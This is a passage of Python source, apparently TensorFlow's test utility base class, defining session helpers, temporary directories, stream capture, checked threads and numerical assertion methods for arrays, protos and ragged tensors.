# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
context.context().summary_writer = None
# Avoid calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during a test, it will return the
same folder. However, across different runs the directories will be
different. This ensures that across different runs tests will not be able
to pollute each other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir())
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results for floating point
attributes, and then uses assertProtoEqual() in case of failure, as it
provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another proto of the same type as `message`, parses the ASCII form
into it, and then compares them using self._AssertProtoEquals().
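For illustration, a minimal sketch where `shape_proto` is a hypothetical
TensorShapeProto produced by the code under test:
```python
self.assertProtoEquals("dim { size: 2 } dim { size: 3 }", shape_proto)
```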
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminated due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True from just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
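A minimal sketch (the `worker` function is a placeholder for real test
logic); assertion failures inside the thread are reported when join() runs:
```python
def worker():
  self.assertEqual(4, 2 + 2)

t = self.checkedThread(target=worker)
t.start()
t.join()
```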
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections.Mapping)
if a_is_dict != isinstance(b, collections.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if that does not work, traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
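For example, nested structures with matching layouts compare element-wise
(the key names below are arbitrary):
```python
expected = {"logits": [[0.1, 0.9]], "loss": 0.25}
actual = {"logits": [[0.1000001, 0.9]], "loss": 0.2500004}
self.assertAllClose(expected, actual, rtol=1e-5, atol=1e-5)
```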
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate lines. A line of ellipses (...) will be appended at the end if the
number of subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
arrays = target if isinstance(target, list) else [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
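A minimal sketch using a predicate instead of a regular expression
(`op_expected_to_fail` is a hypothetical tensor whose evaluation raises):
```python
def _mentions_shape(e):
  return "shape" in str(e).lower()

with self.assertRaisesWithPredicateMatch(errors.OpError, _mentions_shape):
  self.evaluate(op_expected_to_fail)
```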
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
